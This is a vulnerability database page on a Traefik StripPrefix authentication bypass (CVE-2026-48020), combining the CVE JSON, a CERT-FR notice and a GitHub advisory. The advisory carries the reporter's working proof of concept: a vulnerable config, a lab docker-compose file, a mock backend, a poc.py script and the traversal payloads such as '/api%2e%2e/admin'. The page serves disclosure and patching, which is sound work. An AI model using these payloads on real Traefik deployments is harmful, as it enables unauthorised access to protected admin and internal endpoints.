Vulnerability-Lookup

CVE-2026-48020 (GCVE-0-2026-48020)

Vulnerability from cvelistv5 – Published: 2026-06-23 19:10 – Updated: 2026-06-24 13:37

Title

Traefik StripPrefix Route-Level Auth Bypass via Path Normalization

Summary

Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.48, 3.6.19, and 3.7.3, there is a high severity vulnerability in Traefik's StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths — such as admin or internal configuration endpoints — without satisfying the authentication middleware attached to the protected router. This vulnerability is fixed in 2.11.48, 3.6.19, and 3.7.3.

Severity

7.8 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

SSVC

Exploitation: none Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-288 - Authentication Bypass Using an Alternate Path or Channel

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/traefik/traefik/security/advis…	x_refsource_CONFIRM
https://github.com/traefik/traefik/releases/tag/v…	x_refsource_MISC
https://github.com/traefik/traefik/releases/tag/v3.6.19	x_refsource_MISC
https://github.com/traefik/traefik/releases/tag/v3.7.3	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
traefik	traefik	Affected: >= 3.7.0-ea.1, < 3.7.3 Affected: >= 3.0.0-beta1, < 3.6.19 Affected: < 2.11.48

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-48020",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-24T13:37:15.853351Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-24T13:37:28.817Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "traefik",
          "vendor": "traefik",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.7.0-ea.1, \u003c 3.7.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 3.0.0-beta1, \u003c 3.6.19"
            },
            {
              "status": "affected",
              "version": "\u003c 2.11.48"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.48, 3.6.19, and 3.7.3, there is a high severity vulnerability in Traefik\u0027s StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths \u2014 such as admin or internal configuration endpoints \u2014 without satisfying the authentication middleware attached to the protected router. This vulnerability is fixed in 2.11.48, 3.6.19, and 3.7.3."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-288",
              "description": "CWE-288: Authentication Bypass Using an Alternate Path or Channel",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-23T19:10:31.557Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v2.11.48",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v2.11.48"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.6.19",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.6.19"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.7.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
        }
      ],
      "source": {
        "advisory": "GHSA-xf64-8mw2-4gr2",
        "discovery": "UNKNOWN"
      },
      "title": "Traefik StripPrefix Route-Level Auth Bypass via Path Normalization"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-48020",
    "datePublished": "2026-06-23T19:10:31.557Z",
    "dateReserved": "2026-05-20T17:44:09.587Z",
    "dateUpdated": "2026-06-24T13:37:28.817Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-48020",
      "date": "2026-06-24",
      "epss": "0.00525",
      "percentile": "0.40382"
    },
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48020\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-24T13:37:15.853351Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-24T13:37:26.223Z\"}}], \"cna\": {\"title\": \"Traefik StripPrefix Route-Level Auth Bypass via Path Normalization\", \"source\": {\"advisory\": \"GHSA-xf64-8mw2-4gr2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 3.7.0-ea.1, \u003c 3.7.3\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0-beta1, \u003c 3.6.19\"}, {\"status\": \"affected\", \"version\": \"\u003c 2.11.48\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.48\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v2.11.48\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.6.19\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.6.19\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.7.3\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.7.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is an HTTP reverse proxy and load balancer. Prior to 2.11.48, 3.6.19, and 3.7.3, there is a high severity vulnerability in Traefik\u0027s StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths \\u2014 such as admin or internal configuration endpoints \\u2014 without satisfying the authentication middleware attached to the protected router. This vulnerability is fixed in 2.11.48, 3.6.19, and 3.7.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-288\", \"description\": \"CWE-288: Authentication Bypass Using an Alternate Path or Channel\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-23T19:10:31.557Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-48020\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-24T13:37:28.817Z\", \"dateReserved\": \"2026-05-20T17:44:09.587Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-23T19:10:31.557Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

CERTFR-2026-AVI-0690

Vulnerability from certfr_avis - Published: 2026-06-05 - Updated: 2026-06-05

De multiples vulnérabilités ont été découvertes dans Traefik. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
Traefik	Traefik	Traefik versions v3.6.x antérieures à v3.6.19
Traefik	Traefik	Traefik versions v2.11.x antérieures à v2.11.48
Traefik	Traefik	Traefik versions v3.7.x antérieures à v3.7.3

References

Title

Publication Time

GHSA-XF64-8MW2-4GR2

Vulnerability from github – Published: 2026-06-11 13:26 – Updated: 2026-06-11 13:26

Summary

Traefik has a StripPrefix Route-Level Auth Bypass via Path Normalization

Details

Summary

There is a high severity vulnerability in Traefik's StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths — such as admin or internal configuration endpoints — without satisfying the authentication middleware attached to the protected router.

Patches

https://github.com/traefik/traefik/releases/tag/v2.11.48
https://github.com/traefik/traefik/releases/tag/v3.6.19
https://github.com/traefik/traefik/releases/tag/v3.7.3

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description # Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../) ## Summary A route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`. A request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`. This is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues. This report specifically affects `StripPrefix`. ## Affected Versions Tested | Image | Observed Version | Result | |---|---|---| | `traefik:v2.11` | `v2.11.46` | Affected | | `traefik:v3.6` | `v3.6.17` | Affected | | `traefik:latest` | `v3.7.1` | Affected | ### Lab Contrast | Image | Result | |---|---| | `traefik:v2.10` | Not reproduced in lab | | `traefik:v3.5` | Not reproduced in lab | ## Vulnerable Configuration Pattern The issue appears when: - a broad public route strips a prefix - while a separate protected route is intended to guard internal/admin paths

http:
  routers:
    public-api:
      rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
      entryPoints:
        - web
      middlewares:
        - strip-api
      service: backend

    protected:
      rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
      entryPoints:
        - web
      middlewares:
        - auth
      service: backend

  middlewares:
    strip-api:
      stripPrefix:
        prefixes:
          - /api

    auth:
      basicAuth:
        users:
          - 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'

  services:
    backend:
      loadBalancer:
        servers:
          - url: http://backend:9000

## Observed Behavior ### Direct Protected Paths These are correctly blocked. | Request | Expected | Observed | |---|---|---| | `GET /admin` | Blocked | `401` | | `GET /internal/config` | Blocked | `401` | ### Expected Public Exclusions These do not expose protected backend paths. | Request | Expected | Observed | |---|---|---| | `GET /api/admin` | Not routed to protected backend path | `404` | | `GET /api/internal/config` | Not routed to protected backend path | `404` | ### Bypass Payloads These reach protected backend paths. | Request | Observed Status | Backend Receives | |---|---|---| | `GET /api../admin` | `200` | `/admin` | | `GET /api%2e%2e/admin` | `200` | `/admin` | | `GET /api../internal/config` | `200` | `/internal/config` | | `GET /api%2e%2e/internal/config` | `200` | `/internal/config` | ## Minimal PoC ### docker-compose.yml

services:
  traefik:
    image: traefik:v3.7
    command:
      - --providers.file.filename=/etc/traefik/dynamic.yml
      - --entrypoints.web.address=:8080
      - --accesslog=true
    ports:
      - "127.0.0.1:18080:8080"
    volumes:
      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro
    depends_on:
      - backend

  backend:
    image: python:3.12-slim
    working_dir: /app
    command: python backend.py
    volumes:
      - ./backend.py:/app/backend.py:ro
    expose:
      - "9000"

### dynamic.yml

http:
  routers:
    public-api:
      rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
      entryPoints:
        - web
      middlewares:
        - strip-api
      service: backend

    protected:
      rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
      entryPoints:
        - web
      middlewares:
        - auth
      service: backend

  middlewares:
    strip-api:
      stripPrefix:
        prefixes:
          - /api

    auth:
      basicAuth:
        users:
          - 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'

  services:
    backend:
      loadBalancer:
        servers:
          - url: http://backend:9000

### backend.py

from http.server import BaseHTTPRequestHandler, HTTPServer
import json

class Handler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def _json(self, status, obj):
        body = json.dumps(obj).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == "/admin":
            self._json(200, {
                "seen_path": self.path,
                "secret": "ADMIN_SECRET_REACHED"
            })
        elif self.path == "/internal/config":
            self._json(200, {
                "seen_path": self.path,
                "secret": "TRAEFIK_LAB_INTERNAL_CONFIG"
            })
        elif self.path == "/admin/exec":
            self._json(200, {
                "seen_path": self.path,
                "rce_chain_marker": True,
                "note": "protected execution endpoint reached"
            })
        else:
            self._json(404, {
                "seen_path": self.path,
                "secret": None
            })

HTTPServer(("0.0.0.0", 9000), Handler).serve_forever()

### poc.py

#!/usr/bin/env python3
from urllib.request import Request, urlopen
from urllib.error import HTTPError

BASE = "http://127.0.0.1:18080"

PATHS = [
    "/admin",
    "/internal/config",
    "/api/admin",
    "/api/internal/config",
    "/api../admin",
    "/api%2e%2e/admin",
    "/api../internal/config",
    "/api%2e%2e/internal/config",
    "/admin/exec",
    "/api/admin/exec",
    "/api../admin/exec",
    "/api%2e%2e/admin/exec",
]

for path in PATHS:
    req = Request(BASE + path)
    try:
        with urlopen(req, timeout=5) as r:
            status = r.status
            body = r.read().decode(errors="replace")
    except HTTPError as e:
        status = e.code
        body = e.read().decode(errors="replace")

    print(f"{path:28} {status} {body[:180]}")

### Run

docker compose up -d
python3 poc.py

## Expected Vulnerable Output

/admin                       401
/internal/config             401
/api/admin                   404
/api/internal/config         404
/api../admin                 200  backend seen_path=/admin
/api%2e%2e/admin             200  backend seen_path=/admin
/api../internal/config       200  backend seen_path=/internal/config
/api%2e%2e/internal/config   200  backend seen_path=/internal/config
/api../admin/exec            200  protected execution endpoint reached
/api%2e%2e/admin/exec        200  protected execution endpoint reached

## Root Cause Hypothesis The vulnerable behavior appears to be caused by path normalization after prefix stripping.

Incoming path:              /api../admin
After StripPrefix("/api"):  /../admin
After JoinPath():           /admin

The request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization. The relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions. ## Security Impact An unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router. Potential impact includes: - Access to protected admin paths - Access to internal configuration endpoints - Exposure of secrets returned by internal backends - Access to protected backend management functionality - Conditional RCE if the protected backend exposes an execution primitive In the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive. This is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality. ## Suggested Severity Suggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Scope Changed was selected because the request bypasses Traefik's route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router. If the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

The issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage. ## Weakness Primary CWE: - `CWE-863: Incorrect Authorization` Related weakness candidates: - `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize` - `CWE-22: Improper Limitation of a Pathname to a Restricted Directory` ## Mitigation Verified in Lab The bypass was blocked when using a stricter prefix boundary:

PathRegexp(`^/api(/|$)`)

or:

PathPrefix(`/api/`) with StripPrefix(`/api/`)

## Relation to Existing Advisories This appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above. This was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate. ## Reporter WonYun / kyun0

Severity

7.8 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.48"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48020"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-11T13:26:57Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThere is a high severity vulnerability in Traefik\u0027s `StripPrefix` middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a `PathPrefix` rule and applies the `StripPrefix` middleware, a request path containing `..` or its percent-encoded form `%2e%2e` can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths \u2014 such as admin or internal configuration endpoints \u2014 without satisfying the authentication middleware attached to the protected router.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.48\n- https://github.com/traefik/traefik/releases/tag/v3.6.19\n- https://github.com/traefik/traefik/releases/tag/v3.7.3\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n# Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../)\n\n## Summary\n\nA route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`.\n\nA request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`.\n\nThis is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues.\n\nThis report specifically affects `StripPrefix`.\n\n## Affected Versions Tested\n\n| Image | Observed Version | Result |\n|---|---|---|\n| `traefik:v2.11` | `v2.11.46` | Affected |\n| `traefik:v3.6` | `v3.6.17` | Affected |\n| `traefik:latest` | `v3.7.1` | Affected |\n\n### Lab Contrast\n\n| Image | Result |\n|---|---|\n| `traefik:v2.10` | Not reproduced in lab |\n| `traefik:v3.5` | Not reproduced in lab |\n\n## Vulnerable Configuration Pattern\n\nThe issue appears when:\n\n- a broad public route strips a prefix\n- while a separate protected route is intended to guard internal/admin paths\n\n```yaml\nhttp:\n  routers:\n    public-api:\n      rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - strip-api\n      service: backend\n\n    protected:\n      rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - auth\n      service: backend\n\n  middlewares:\n    strip-api:\n      stripPrefix:\n        prefixes:\n          - /api\n\n    auth:\n      basicAuth:\n        users:\n          - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n  services:\n    backend:\n      loadBalancer:\n        servers:\n          - url: http://backend:9000\n```\n\n## Observed Behavior\n\n### Direct Protected Paths\n\nThese are correctly blocked.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /admin` | Blocked | `401` |\n| `GET /internal/config` | Blocked | `401` |\n\n### Expected Public Exclusions\n\nThese do not expose protected backend paths.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /api/admin` | Not routed to protected backend path | `404` |\n| `GET /api/internal/config` | Not routed to protected backend path | `404` |\n\n### Bypass Payloads\n\nThese reach protected backend paths.\n\n| Request | Observed Status | Backend Receives |\n|---|---|---|\n| `GET /api../admin` | `200` | `/admin` |\n| `GET /api%2e%2e/admin` | `200` | `/admin` |\n| `GET /api../internal/config` | `200` | `/internal/config` |\n| `GET /api%2e%2e/internal/config` | `200` | `/internal/config` |\n\n## Minimal PoC\n\n### docker-compose.yml\n\n```yaml\nservices:\n  traefik:\n    image: traefik:v3.7\n    command:\n      - --providers.file.filename=/etc/traefik/dynamic.yml\n      - --entrypoints.web.address=:8080\n      - --accesslog=true\n    ports:\n      - \"127.0.0.1:18080:8080\"\n    volumes:\n      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n    depends_on:\n      - backend\n\n  backend:\n    image: python:3.12-slim\n    working_dir: /app\n    command: python backend.py\n    volumes:\n      - ./backend.py:/app/backend.py:ro\n    expose:\n      - \"9000\"\n```\n\n### dynamic.yml\n\n```yaml\nhttp:\n  routers:\n    public-api:\n      rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - strip-api\n      service: backend\n\n    protected:\n      rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - auth\n      service: backend\n\n  middlewares:\n    strip-api:\n      stripPrefix:\n        prefixes:\n          - /api\n\n    auth:\n      basicAuth:\n        users:\n          - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n  services:\n    backend:\n      loadBalancer:\n        servers:\n          - url: http://backend:9000\n```\n\n### backend.py\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\n\nclass Handler(BaseHTTPRequestHandler):\n    def log_message(self, fmt, *args):\n        return\n\n    def _json(self, status, obj):\n        body = json.dumps(obj).encode()\n        self.send_response(status)\n        self.send_header(\"Content-Type\", \"application/json\")\n        self.send_header(\"Content-Length\", str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n\n    def do_GET(self):\n        if self.path == \"/admin\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"secret\": \"ADMIN_SECRET_REACHED\"\n            })\n        elif self.path == \"/internal/config\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"secret\": \"TRAEFIK_LAB_INTERNAL_CONFIG\"\n            })\n        elif self.path == \"/admin/exec\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"rce_chain_marker\": True,\n                \"note\": \"protected execution endpoint reached\"\n            })\n        else:\n            self._json(404, {\n                \"seen_path\": self.path,\n                \"secret\": None\n            })\n\nHTTPServer((\"0.0.0.0\", 9000), Handler).serve_forever()\n```\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError\n\nBASE = \"http://127.0.0.1:18080\"\n\nPATHS = [\n    \"/admin\",\n    \"/internal/config\",\n    \"/api/admin\",\n    \"/api/internal/config\",\n    \"/api../admin\",\n    \"/api%2e%2e/admin\",\n    \"/api../internal/config\",\n    \"/api%2e%2e/internal/config\",\n    \"/admin/exec\",\n    \"/api/admin/exec\",\n    \"/api../admin/exec\",\n    \"/api%2e%2e/admin/exec\",\n]\n\nfor path in PATHS:\n    req = Request(BASE + path)\n    try:\n        with urlopen(req, timeout=5) as r:\n            status = r.status\n            body = r.read().decode(errors=\"replace\")\n    except HTTPError as e:\n        status = e.code\n        body = e.read().decode(errors=\"replace\")\n\n    print(f\"{path:28} {status} {body[:180]}\")\n```\n\n### Run\n\n```bash\ndocker compose up -d\npython3 poc.py\n```\n\n## Expected Vulnerable Output\n\n```text\n/admin                       401\n/internal/config             401\n/api/admin                   404\n/api/internal/config         404\n/api../admin                 200  backend seen_path=/admin\n/api%2e%2e/admin             200  backend seen_path=/admin\n/api../internal/config       200  backend seen_path=/internal/config\n/api%2e%2e/internal/config   200  backend seen_path=/internal/config\n/api../admin/exec            200  protected execution endpoint reached\n/api%2e%2e/admin/exec        200  protected execution endpoint reached\n```\n\n## Root Cause Hypothesis\n\nThe vulnerable behavior appears to be caused by path normalization after prefix stripping.\n\n```text\nIncoming path:              /api../admin\nAfter StripPrefix(\"/api\"):  /../admin\nAfter JoinPath():           /admin\n```\n\nThe request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization.\n\nThe relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions.\n\n## Security Impact\n\nAn unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router.\n\nPotential impact includes:\n\n- Access to protected admin paths\n- Access to internal configuration endpoints\n- Exposure of secrets returned by internal backends\n- Access to protected backend management functionality\n- Conditional RCE if the protected backend exposes an execution primitive\n\nIn the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive.\n\nThis is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality.\n\n## Suggested Severity\n\nSuggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n```\n\nScope Changed was selected because the request bypasses Traefik\u0027s route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router.\n\nIf the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n```\n\nThe issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage.\n\n## Weakness\n\nPrimary CWE:\n\n- `CWE-863: Incorrect Authorization`\n\nRelated weakness candidates:\n\n- `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize`\n- `CWE-22: Improper Limitation of a Pathname to a Restricted Directory`\n\n## Mitigation Verified in Lab\n\nThe bypass was blocked when using a stricter prefix boundary:\n\n```text\nPathRegexp(`^/api(/|$)`)\n```\n\nor:\n\n```text\nPathPrefix(`/api/`) with StripPrefix(`/api/`)\n```\n\n## Relation to Existing 